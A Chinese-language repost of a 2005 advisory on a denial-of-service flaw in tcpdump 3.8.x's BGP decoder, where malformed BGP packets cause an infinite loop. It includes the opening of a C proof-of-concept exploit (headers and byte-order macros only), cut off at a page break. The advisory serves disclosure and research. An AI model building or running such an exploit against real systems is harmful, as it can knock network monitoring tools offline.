当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 信息提供： 安全公告（或线索）提供热线：51c

 

 

TCPDump BGP解码例程拒绝服务漏洞

【程序编程相关:Cisco VPN 5000系列集中器R】

【推荐阅读:Cisco VPN client存在多个】

信息提供: 【扩展信息:Cisco IOS TFTP服务超长文件】

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别:

设计错误

攻击类型:

拒绝服务攻击

发布日期:

2005-04-27

更新日期:

2005-04-27

受影响系统:

lbl tcpdump 3.8.x

安全系统:

无

漏洞报告人:

vade 79 （v9@fakehalo.deadpig.org）

漏洞描述:

bugtraq  id: 13380

tcpdump是一款免费的网络分析程序,适用于多种unix操作系统.

tcpdump可能允许远程攻击者导致软件拒绝服务,起因是tcpdump解码border gateway protocol (bgp)报文的方式存在漏洞.远程攻击者可以通过发送畸形的bgp报文导致软件陷入死循环.

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负！

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <signal.h>

#include <time.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <netdb.h>

#ifdef _use_arpa

#include <arpa/inet.h>

#endif

/* doesnt seem to be standardized, so... */

#if defined(__byte_order) && !defined(byte_order)

#define byte_order __byte_order

#endif

#if defined(__big_endian) && !defined(big_endian)

#define big_endian __big_endian

#endif

#if defined(byte_order) && defined(big_endian)

#if byte_order == big_endian

#define _use_big_endian

#endif

#endif

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：